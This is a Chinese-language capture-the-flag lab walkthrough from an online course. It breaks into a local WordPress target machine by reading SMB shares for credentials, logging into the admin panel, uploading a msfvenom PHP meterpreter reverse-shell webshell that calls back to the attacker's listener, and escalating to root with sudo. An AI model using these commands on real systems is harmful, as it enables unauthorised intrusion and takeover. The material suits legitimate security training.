51CTO的网课,本篇针对SMB协议弱点分析,登录共享目录查找敏感文件;针对HTTP协议弱点分析,寻找突破点,登录后台上传webshell,提权获取flag。
本篇使用工具nmap、dirb、metasploit、webshell。
使用命令
nmap
探测靶场开放的服务与服务的版本
探测靶场全部信息
1
| -- nmap -A -v -T4 靶场IP地址
|
dirb
smbclient
1 2 3
| smbclient -L 靶机IP smbclient '\\靶机IP\share' get 敏感文件
|
mysql
1
| mysql -h 靶机IP -u Admin -p 口令
|
1 2 3 4 5 6
| msfconsole >use exploit/multi/handler >set payload php/meterpreter/reverse_tcp >set lhost 攻击机IP >set lport 攻击机端口 >run
|
webshell
1 2
| msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP lport=监听端口 -f raw > /root/Desktop/shell.php
|
1 2 3
|
http://靶机IP/wordpress/wp-content/themes/twentyfifteen/404.php
|
shell优化
1
| python -c "import pty;pty.spawn('/bin/bash')"
|
渗透记录
- nmap扫描靶机IP地址开放端口、系统信息等:
1 2
| nmap -sV 192.168.1.113 nmap -A -v -T4 192.168.1.113
|
- 访问smb服务,搜集敏感信息,share共享文件夹里可能有敏感信息:
1 2 3
| smbclient -L 192.168.1.113 smbclient '\\192.168.1.113\share' get 敏感文件
|
- 都查看一下,找到两个敏感文件
\share\deets.txt
和\share\wordpress\wp-config.php
:
- 利用搜集到的秘钥尝试连接mysql和ssh,均被拒绝:
- smb协议也可以用metasploit搜索可利用漏洞,这里无可利用漏洞:
1 2
| searchsploit Samba smbd 3.X - 4.X searchsploit Samba smbd 4.3.11-Ubuntu
|
- dirb搜索目录,查找可利用文件,找到了登录后台:
1
| dirb http://192.168.1.113
|
- 尝试使用前面的mysql密码成功登录:
- 生成反弹webshell脚本:
1
| msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.114 lport=4444 -f raw > /root/Desktop/shell.php
|
- metaspolit开启监听:
1 2 3 4 5 6
| msfconsole >use exploit/multi/handler >set payload php/meterpreter/reverse_tcp >set lhost 192.168.1.114 >set lport 4444 >run
|
- 网页后台上传webshell:
1 2 3
|
http://靶机IP/wordpress/wp-content/themes/twentyfifteen/404.php
|
- 访问404网页,可以看到反弹shell成功:
- 进入shell,优化输入,尝试切换root用户,失败:
1
| python -c "import pty;pty.spawn('/bin/bash')"
|
- 查看用户组,发现togie在
/home
目录下,是一个用户:
- 切换到用户togie,密码是前面第3步搜集到的
12345
,查看权限,提权:
1 2 3
| su togie sudo -l sudo su
|
- 提权成功,切换到根目录,拿到flag:
参考资料
- 2020发布 CTF基础入门/CTF教程零基础 渗透测试/web安全/CTF夺旗【整套教程】
- 3-1CTF夺旗入门教程–SMB信息泄露